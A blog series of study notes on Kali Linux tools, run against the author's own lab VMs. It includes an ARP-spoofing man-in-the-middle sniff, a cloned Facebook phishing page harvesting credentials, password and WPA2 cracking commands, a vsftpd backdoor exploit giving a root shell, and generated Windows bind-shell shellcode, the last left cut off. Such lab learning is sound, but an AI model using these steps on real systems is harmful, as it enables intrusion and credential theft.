Wednesday, March 30, 2016

Kali Tool Series - Websploit

Although it seems that there are other more handly tools for web exploits other than Websploit, it still interests me by having a similiar inferface as Metasploit.

To Start

> websploit

 __    __    ___  ____    _____ ____  _       ___  ____  ______
|  |__|  |  /  _]|    \  / ___/|    \| |     /   \|    ||      |
|  |  |  | /  [_ |  o  )(   \_ |  o  ) |    |     ||  | |      |
|  |  |  ||    _]|     | \__  ||   _/| |___ |  O  ||  | |_|  |_|
|  `  '  ||   [_ |  O  | /  \ ||  |  |     ||     ||  |   |  |
 \      / |     ||     | \    ||  |  |     ||     ||  |   |  |
  \_/\_/  |_____||_____|  \___||__|  |_____| \___/|____|  |__|


                --=[WebSploit FrameWork
        +---**---==[Version :2.0.5 BETA
        +---**---==[Codename :We're Not Crying Wolf
        +---**---==[Available Modules : 19
                --=[Update Date : [r2.0.5-000 2.3.2014]



wsf >

Show available modules

wsf > show modules

Web Modules                     Description
-------------------             ---------------------
web/apache_users                Scan Directory Of Apache Users
web/dir_scanner                 Directory Scanner
web/wmap                        Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma                         PHPMyAdmin Login Page Scanner
web/cloudflare_resolver         CloudFlare Resolver


Network Modules                 Description
-------------------             ---------------------
network/arp_dos                 ARP Cache Denial Of Service Attack
network/mfod                    Middle Finger Of Doom Attack
network/mitm                    Man In The Middle Attack
network/mlitm                   Man Left In The Middle Attack
network/webkiller               TCP Kill Attack
network/fakeupdate              Fake Update Attack Using DNS Spoof
network/arp_poisoner            Arp Poisoner


Exploit Modules                 Description
-------------------             ---------------------
exploit/autopwn                 Metasploit Autopwn Service
exploit/browser_autopwn         Metasploit Browser Autopwn Service
exploit/java_applet             Java Applet Attack (Using HTML)


Wireless / Bluetooth Modules            Description
-------------------             ---------------------
wifi/wifi_jammer                Wifi Jammer
wifi/wifi_dos                   Wifi Dos Attack
wifi/wifi_honeypot              Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod         Bluetooth Ping Of Death Attack

Cases

Here, I am going to try some modules in Websploit. And, the target will be my own Metasploitable2 virtual machine. Make sure you don’t try any actions described here on a running machine that doesn’t belong to you.

Scan Directories

We are scanning the directories under the target machine using HTTP requests with bruteforce. As far as I know, DirBuster is also famous for doing this job. And, by doing this action, it’s easy for the target machine to be noticed since lots of invalid requests will be sent out in a short period.

wsf > use web/dir_scanner
wsf:Dir_Scanner > show options

Options          Value
---------       --------------
TARGET          http://google.com

wsf:Dir_Scanner > set target http://192.168.63.156
TARGET =>  192.168.63.156

wsf > run
…

However, I don’t think the program does a good job as it doesn’t print out the result in the same time, the user might have to wait util it’s completed. And, it usually takes a long time.

Man in the Middle

Man in the Middle is an interesting attack. The attacker stay silent and steal the network traffic from the victim, then pass it over. That is, the victim may not notice that his/her traffic is totally monitored by the attacker.

Attacker side:

wsf > use network/mitm
wsf:MITM > show options

Options          Value                           RQ      Description
---------       --------------                  ----    --------------
Interface       eth0                            yes     Network Interface Name
ROUTER          192.168.1.1                     yes     Router IP Address
TARGET          192.168.1.2                     yes     Target IP Address
SNIFFER         driftnet                        yes     Sniffer Name (Select From Sniffer List)
SSL             true                            yes     SSLStrip, For SSL Hijacking(true or false)


Sniffers         Description
------------    --------------
dsniff           Sniff All Passwords
msgsnarf         Sniff All Text Of Victim Messengers
urlsnarf         Sniff Victim Links
driftnet         Sniff Victim Images

wsf:MITM > set TARGET 192.168.63.156
TARGET =>  192.168.63.156
wsf:MITM > set ROUTER 192.169.63.1
ROUTER =>  192.169.63.1
wsf:MITM > set SNIFFER urlsnarf
SNIFFER =>  urlsnarf
wsf:MITM > run
[*]IP Forwarding ...
[*]ARP Spoofing ...
[*]Sniffer Starting ...
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

Then, the victim start to browse the Internet. I’m letting the victim run wget google.com to simulate Internet surfing.

Back to the attacker, here’s that he/she recieved:

192.168.63.156 - - [30/Mar/2016:17:36:16 +0800] "GET http://google.com/ HTTP/1.0" - - "-" "Wget/1.10.2"
192.168.63.156 - - [30/Mar/2016:17:36:26 +0800] "GET http://www.google.com.tw/?gfe_rd=cr&ei=D577VtbIMZCS9QWylY-AAw HTTP/1.0" - - "-" "Wget/1.10.2"

Reference

Tuesday, March 29, 2016

Kali Tool Series - Maltego

Maltego is a reconnaissance tool built into Kali developed by Paterva, which is a powerful information gathering tool that deals with Internet infrastructures to personal information and social networks.

Palette

Palette, here, refers to the object types supported by Maltego for drawing the network graph of the target. For each object type, it means an item in real world, and obtains relavant attributes. By running tranform actions, we can expand one object to the whole network of interest.
In Maltego, we got following types in Palette:
  • Device
  • Infrastructure
    • AS
    • DNS Name
    • Domain
    • IPv4 Address
    • MX Record
    • NS Record
    • Netblock
    • URL
    • UniqueIdentifier
    • Website
  • Locations
    • Circular Area
    • GPS Coordinate
    • Location
  • Personal
    • Alias
    • Document
    • Email Address
    • Image
    • Person
    • Phone Number
    • Phrase
  • Social Network
    • Facebook
    • Twitter

Steps

Step 1 - Open Maltego
Open Maltego at Application menu → Information Gathering → Maltego (or, just type maltego in Terminal), then register an account, select transform seeds to install.
Step 2 - Pick a Start Node
You can start from a website URL, a person, or anything that mentioned above in the Palette.
Step 3 - Expand
Right click on the object, then perform “transform” action, which will expand the graph by providing more connection to other objects.

Example Output


Gather information starts from my domain, heron.me.


Gather information starts from me, "Heron Yang".

Transform Seeds

Seeds are small pieces of XML that tell the Maltego client where it should look (at which servers) for transforms. Seeds can be thought of as something like the index of a book where you can use that to see where the relevant content is located.

Reference

Friday, March 25, 2016

Kali Tool Series - The Social-Engineer Toolkit

Preface

“Social Engineering” is a sub-field of network security. It’s much more un-related to the technical things, but frauding people around in order to hack into an unauthorized system.

The content here is only for studying purpose, one SHOULD NOT deploy in real world environment, which is illegal. While you practice, make sure you test on your own machines only and don’t fraud people.

Build a Fishing Website

The basic example, we are building a fake login website for people to put username and password.
> setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

             Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1
 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.
  
set> 2

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu

set:webattack> 3

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
Then, it will ask the IP of your Kali machine, which can be accessed by ifconfig command. Mine is 192.168.63.155 here.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155

  1. Java Required
  2. Google
  3. Facebook
  4. Twitter
  5. Yahoo
  
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.facebook.com/

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue}
Now, you’re all set. By default, the files are generated at /var/www/. However, we have to put them into /var/www/html/, which is the default folder of apache.
> cd /var/www/
> mkdir html/facebook
> mv index.html html/facebook/
> mv post.php har*txt html/
Okay, then open the url (mine is http://192.168.63.155/facebook/) on any machine that can reach your Kali machine.



Finally, you will get the username and password in harvester_….txt file:
> cat /var/www/html/har*.txt
Array
(
    [lsd] => AVqaOX85
    [display] =>
    [enable_profile_selector] =>
    [isprivate] =>
    [legacy_return] => 1
    [profile_selector_ids] =>
    [skip_api_login] =>
    [signed_next] =>
    [trynum] => 1
    [timezone] => -825
    [lgndim] => eyJ3IjoxNDQwLCJoIjo5MDAsImF3IjoxNDQ… =
    [lgnrnd] => 194144_MLVw
    [lgnjs] => 1458894004
    [email] => apple
    [pass] => banana
    [login] => 1
    [default_persistent] => 0
    [qsstamp] => W1tbOSwxMiwWEtwbVV6am45Zzd3…
)

Saturday, March 19, 2016

Kali Tool Series - John the Ripper

John the Ripper is a tool for getting passwords by bruteforcing. Make sure you don’t apply any of followings more others’ accounts or services. Try your own accounts or services.

Get Password of an Unix-like Machine

Followings are only work with an unix-like machine, and the user had already gained the access of files on it. That is, we need /etc/passwd and /etc/shadow (only /etc/passwd for acient machine).

> unshadow /etc/passwd /etc/shadow > ~/passwd

Use John’s default word list to crack the password:

> john ~/passwd

Use custom wordlist:

> john --wordlist=word.list ~/passwd

where word.list is your custom list.

To show the result:

> john --show ~/passwd

Crack Wifi

Use Wordlist (WPA2)

Use wireshark or airodump-ng to get .cap file of the traffic. Then:

> aircrack-ng –w wordlist.lst -b 00:0c:29:80:9a:85 my_traffic*.cap

where -b option indicates the MAC of your targetting BSSID, and input files are those .cap files.

Try All

Another solution is to try every possible password which is guaranteed to found the password, but it might also take forever.

> john -stdout -incremental | aircrack-ng -b 00:0c:29:80:9a:85 -w - my_traffic*.cap

Session Control

To run a long password testing process, we can make it run in the background:

> john --session=all_rules_session --wordlist=all.lst &

To check the session status:

> john --status=all_rules_session
0g 0:00:00:02  2/3 0g/s 411.5p/s 411.5c/s 411.5C/s

To restore the session:

> john --restore

Password Wordlist

For longer wordlist, one can find it online. However, there are some existing wordlist on Kali for users to apply.

> ls /usr/share/wordlists/
dirb  dirbuster  dnsmap.txt  fasttrack.txt  fern-wifi  metasploit  metasploit-jtr  nmap.lst  rockyou.txt.gz  sqlmap.txt  termineter.txt  wfuzz

they are wordlist files from different applications:

> file /usr/share/wordlists/*
/usr/share/wordlists/dirb:           symbolic link to /usr/share/dirb/wordlists
/usr/share/wordlists/dirbuster:      symbolic link to /usr/share/dirbuster/wordlists
...
/usr/share/wordlists/wfuzz:          symbolic link to /usr/share/wfuzz/wordlist

Interestingly, the best wordlist is actually hidden in the rockyou.txt.gz, so:

> gzip -dc < rockyou.txt.gz > ~/wordlist.txt

then we got wordlist.txt.

Resource

Monday, March 14, 2016

Kali Tool Series - Nessus

Nessus is an open source vulnerability scanner, which scans a network for potential security risks and provide detailed reports.
Few facts about Nessus:
  • founded by Renuad Deraison in 1998
  • supports multiple systems: Windows, Linux, Mac OS X, Sun, Solaris, etc

Feature

  • host/port discovery
  • identifies vulnerabilities
  • checks whether the systems have the latest software patches
  • tries with default passwords, common passwords on system accounts
  • malware/botnet detection
(from reference 1 and reference 2)

Install and Setup

Download Nessus at its official site (registration is required, Home version is for free)
After installation, open https://localhost:8834/ on your machine to start Nessus.

Component

  • Reports: reports from all the past scans of a target or a set of targets
  • Scans: configure or run a new scan
  • Policies: configure the things you would like to run for the scans
  • Users: different users may have different permission to apply different policies
(Reference)

Policy

Open https://localhost:8834/, and click on “+New Policy” button in the Policy tab.
The information of scanner templates provided by the policy wizard can be found here.

Settings

  • Basics
    • general: name / description
    • permission: private / share
  • Discovery: host disvocery / port scanning / service discovery
  • Assessment: for “web application” only
  • Report: configure the scan reports
  • Advanced: performance settings, additional checks, and logging features

Scan

Click on “+New Scan” button, then pick scanner template, or user created policy.

General

  • name
  • description
  • folder
  • scanner
  • targets: IP or domain name (ex. 192.168.1.0/24, 192.168.2.1, example.com)
  • upload targets: a file that contains target list

Schedule

Default is disabled.
  • launch: pick its frequency - once, daily, weekly, monthly, or yearly
  • starts on: start time
  • time zone
  • summary

Email Notification

Setting up SMTP is required.

Launch

Click on the play icon or the “launch” button, the scan will start directly.

View Results

The result page

  • Configure: directs back to the scan settings
  • Audit Trail: pulls up the audit trail dialogue
  • Launch
  • Export: allows you to save the scan result in Nessus (.nessus), PDF, HTML, CSV, or Nessus DB.

Turn On/Off Nessus

Nessus runs as service in background as default.
To turn on:
sudo launchctl load -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist
To turn off:
sudo launchctl unload -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist

Saturday, March 12, 2016

Kali Tool Series - Metasploit

Preface

This is the first post of Kali Tool Series I wrote as my own studying notes.

Introduction

Metasploit is a vulnerability and exploitation framework with a collection of exploits designed for security proessionals to perform security assessments.

Few facts about Metasploit:

  • written in Ruby
  • acquired by Rapid7
  • integrates with other common penetration testing tools: Nessus, Nmap

Also, it’s worth to know that a successful service exploitation requires following elements (reference):

  • vulnerability: a flaw in a system which can be utilized as an avenue of attack
  • exploit: a program specifically designed to leverage a vulnerability
  • payload: code to be run on the system after the vulnerability has been exploited

Modules

Before started, it’s better to briefly understand the modules in it, which can be roughly grouped into followings (reference is here):

Auxiliary modules

Useful tools like for:

  • intormation gathering
  • enumeration
  • port scanning
  • connecting to SQL databases
  • etc

Exploit modules

Modules used to deliver exploit code to a target system.

Post modules

Post exploitation tools for things like extracting passwords hashes/access tokens, taking screenshots, key-logging and downloading files.

Payload modules

Malicious payloads used after an exploitation. In Metasploit, it’s better to upload a copy of “meterpreter” payload, which opens a meterpreter backdoor smoothly.

Testing Environment

Okay, since what we are doing here may create some changes (or you can say damages) on the target machine. We can’t do this on a deployed machine without permission. Therefore, I setup a Metasploitable virtual machine as my target, which contains lots of vulnerabilities by default.

Both the target (Metasploitable) and the attacker (Kali) are virtual machines under the same local network in my following tests.

Working Flow

Here’s a demo flow using Metasploit.

1. Information Gathering

Host Discovery

First, we have to locate the machine by scanning my local network (192.168.0.x).

I’m using ARP scanning:

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target address range or CIDR identifier
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    5                yes       The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 192.168.63.0-255
RHOSTS => 192.168.63.0-255
msf auxiliary(arp_sweep) > run

[*] 192.168.63.1 appears to be up (VMware, Inc.).
[*] 192.168.63.2 appears to be up (VMware, Inc.).
[*] 192.168.63.156 appears to be up (VMware, Inc.).
[*] 192.168.63.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, 192.168.63.156 would be our target machine since others don’t seem like a normal device.

In addition, of course, one can use Nmap to do all the work for this part instead:

nmap -v -sV 192.168.63.1/24

Port Scanning

Then, we scan the open port of our target machine (192.168.63.156):

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.63.156   yes       The target address range or CIDR identifier
   THREADS      50               yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds
msf auxiliary(tcp) > run

[*] 192.168.63.156:25 - TCP OPEN
[*] 192.168.63.156:23 - TCP OPEN
[*] 192.168.63.156:22 - TCP OPEN
[*] 192.168.63.156:21 - TCP OPEN
[*] 192.168.63.156:53 - TCP OPEN
[*] 192.168.63.156:80 - TCP OPEN
… (dismiss)

By knowing which ports the machine is using, we can know which services are running on it.

2. Find Vulnerability

To find vulnerability, we may need to know the version of the service, and look it out on the database to see if there’s any known vulnerability.

Find Versions

SSH:

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ssh_version) > run

[*] 192.168.63.156:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

FTP:

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ftp_version) > run

[*] 192.168.63.156:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, the target machine is running vsFTPd 2.3.4.

Check Database

Let’s focus on vsFTPd, which is more likely to be vulnerable comparing to SSH. So, go to exploit-db, search keyword “vsFTPd”, and luckily we got “VSFTPD 2.3.4 - Backdoor Command Execution”.

To sum what we’ve got so far: the target machine is running an outdated service which contains a well-known flaw.

Find the Exploit Method

Then, let’s search it on your metesploit:

msf > search vsftpd

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

Nice, the module exploit/unix/ftp/vsftpd_234_backdoor is what we need now.

3. Exploit

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   Name               Disclosure Date  Rank    Description
   ----               ---------------  ----    -----------
   cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.63.156   yes       The target address
   RPORT  21               yes       The target port


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic

There’s only one payload we can apply for this exploit, cmd/unix/interact, which means that the interaction will be setup directly after exploitation.

Now, we succeed:

msf exploit(vsftpd_234_backdoor) > run

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.63.155:53640 -> 192.168.63.156:6200) at 2016-03-11 21:22:39 +0800

whoami
root
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

Custom Payload

In some cases, we may need custom payloads, like what I did for Secure Programming class in 2014.

Pick a payload and its generate shellcode (using payload/windows/shell_bind_tcp as example here):

msf > use payload/windows/shell_bind_tcp
msf payload(shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"

Avoid the shellcode contains specific characters (take \x00 as example):

msf payload(shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xbf\x41\x3a\x72\xae\xda\xdf\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x53\x31\x78\x12\x03\x78\x12\x83\x81\x3e\x90\x5b\xfd" +
"\xd7\xd6\xa4\xfd\x27\xb7\x2d\x18\x16\xf7\x4a\x69\x09\xc7" +
"\x19\x3f\xa6\xac\x4c\xab\x3d\xc0\x58\xdc\xf6\x6f\xbf\xd3" +
"\x07\xc3\x83\x72\x84\x1e\xd0\x54\xb5\xd0\x25\x95\xf2\x0d" +
"\xc7\xc7\xab\x5a\x7a\xf7\xd8\x17\x47\x7c\x92\xb6\xcf\x61" +
"\x63\xb8\xfe\x34\xff\xe3\x20\xb7\x2c\x98\x68\xaf\x31\xa5" +
"\x23\x44\x81\x51\xb2\x8c\xdb\x9a\x19\xf1\xd3\x68\x63\x36" +
"\xd3\x92\x16\x4e\x27\x2e\x21\x95\x55\xf4\xa4\x0d\xfd\x7f" +
"\x1e\xe9\xff\xac\xf9\x7a\xf3\x19\x8d\x24\x10\x9f\x42\x5f" +
"\x2c\x14\x65\x8f\xa4\x6e\x42\x0b\xec\x35\xeb\x0a\x48\x9b" +
"\x14\x4c\x33\x44\xb1\x07\xde\x91\xc8\x4a\xb7\x56\xe1\x74" +
"\x47\xf1\x72\x07\x75\x5e\x29\x8f\x35\x17\xf7\x48\x39\x02" +
"\x4f\xc6\xc4\xad\xb0\xcf\x02\xf9\xe0\x67\xa2\x82\x6a\x77" +
"\x4b\x57\x06\x7f\xea\x08\x35\x82\x4c\xf9\xf9\x2c\x25\x13" +
"\xf6\x13\x55\x1c\xdc\x3c\xfe\xe1\xdf\x53\xa3\x6c\x39\x39" +
"\x4b\x39\x91\xd5\xa9\x1e\x2a\x42\xd1\x74\x02\xe4\x9a\x9e" +
"\x95\x0b\x1b\xb5\xb1\x9b\x90\xda\x05\xba\xa6\xf6\x2d\xab" +
"\x31\x8c\xbf\x9e\xa0\x91\x95\x48\x40\x03\x72\x88\x0f\x38" +
"\x2d\xdf\x58\x8e\x24\xb5\x74\xa9\x9e\xab\x84\x2f\xd8\x6f" +
"\x53\x8c\xe7\x6e\x16\xa8\xc3\x60\xee\x31\x48\xd4\xbe\x67" +
"\x06\x82\x78\xde\xe8\x7c\xd3\x8d\xa2\xe8\xa2\xfd\x74\x6e" +
"\xab\x2b\x03\x8e\x1a\x82\x52\xb1\x93\x42\x53\xca\xc9\xf2" +
"\x9c\x01\x4a\x02\xd7\x0b\xfb\x8b\xbe\xde\xb9\xd1\x40\x35" +
"\xfd\xef\xc2\xbf\x7e\x14\xda\xca\x7b\x50\x5c\x27\xf6\xc9" +
"\x09\x47\xa5\xea\x1b"

So, we get a payload withtou \x00, which is reasonably longer than the previous one.

Then, we can apply some encoders onto the shellcode like. To list all available encoders:

msf payload(shell_bind_tcp) > show encoders

Encoders
========

   Name                          Disclosure Date  Rank       Description
   ----                          ---------------  ----       -----------
   cmd/echo                                       good       Echo Command Encoder
   cmd/generic_sh                                 manual     Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                        low        Generic ${IFS} Substitution Command Encoder
   cmd/perl                                       normal     Perl Command Encoder
   cmd/powershell_base64                          excellent  Powershell Base64 Command Encoder
   cmd/printf_php_mq                              manual     printf(1) via PHP magic_quotes Utility Command Encoder
   generic/eicar                                  manual     The EICAR Encoder
   … (dismiss)

Generate code with decoder:

msf payload(shell_bind_tcp) > generate -e x86/nonalpha
# windows/shell_bind_tcp - 470 bytes
# http://www.metasploit.com
# Encoder: x86/nonalpha
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x6a\x8b\xd7" +
"\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28\x07\xeb" +
"\xf1\xeb\x6f\xe8\xe2\xff\xff\xff\x17\x2b\x29\x29\x09\x31" +
"\x1a\x29\x24\x29\x31\x2f\x03\x33\x2a\x22\x32\x32\x06\x06" +
"\x23\x23\x15\x30\x23\x37\x1a\x22\x21\x2a\x21\x13\x13\x04" +
"\x08\x27\x13\x2f\x04\x27\x2b\x13\x10\x11\x22\x2b\x2b\x2b" +
"\x13\x13\x11\x25\x24\x13\x14\x24\x13\x24\x13\x07\x24\x13" +
"\x06\x0d\x2e\x1a\x13\x18\x0e\x17\x24\x24\x24\x11\x22\x25" +
"\x15\x37\x37\x37\x27\x2b\x25\x25\x25\x35\x25\x2d\x25\x25" +
"\x28\x25\x13\x02\x2d\x25\x35\x13\x25\x13\x06\x34\x09\x0c" +
"\x11\x28\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x7b" +
"\x8b\x7b\x30\x8b\x7b\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7" +
"\x7b\x26\x31\xff\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf2\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x8b\x7b" +
"\x11\x7b\xe3\x7b\x01\xd1\x7b\x8b\x7b\x20\x01\xd3\x8b\x7b" +
"\x18\xe3\x3a\x7b\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf" +
"\x0d\x01\xc7\x38\xe0\x7b\xf6\x03\x7d\xf8\x3b\x7d\x24\x7b" +
"\xe4\x7b\x8b\x7b\x24\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c" +
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b" +
"\x7b\x7b\x7b\xff\xe0\x5f\x5f\x7b\x8b\x12\xeb\x8d\x5d\x7b" +
"\x33\x32\x00\x00\x7b\x7b\x7b\x32\x5f\x7b\x7b\x7b\x7b\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x7b\x7b\x7b\x29" +
"\x80\x7b\x00\xff\xd5\x7b\x08\x7b\x7b\xe2\xfd\x40\x7b\x40" +
"\x7b\x7b\xea\x0f\xdf\xe0\xff\xd5\x97\x7b\x02\x00\x11\x5c" +
"\x89\xe6\x7b\x10\x7b\x7b\x7b\xc2\xdb\x37\x7b\xff\xd5\x7b" +
"\x7b\xb7\xe9\x38\xff\xff\xd5\x7b\x7b\x7b\xec\x3b\xe1\xff" +
"\xd5\x7b\x97\x7b\x7b\x7b\x7b\x7b\xff\xd5\x7b\x7b\x7b\x7b" +
"\x00\x89\xe3\x7b\x7b\x7b\x31\xf6\x7b\x12\x7b\x7b\xe2\xfd" +
"\x7b\xc7\x7b\x24\x3c\x01\x01\x8d\x7b\x24\x10\xc6\x00\x7b" +
"\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b" +
"\xcc\x3f\x86\xff\xd5\x89\xe0\x7b\x7b\x7b\xff\x30\x7b\x08" +
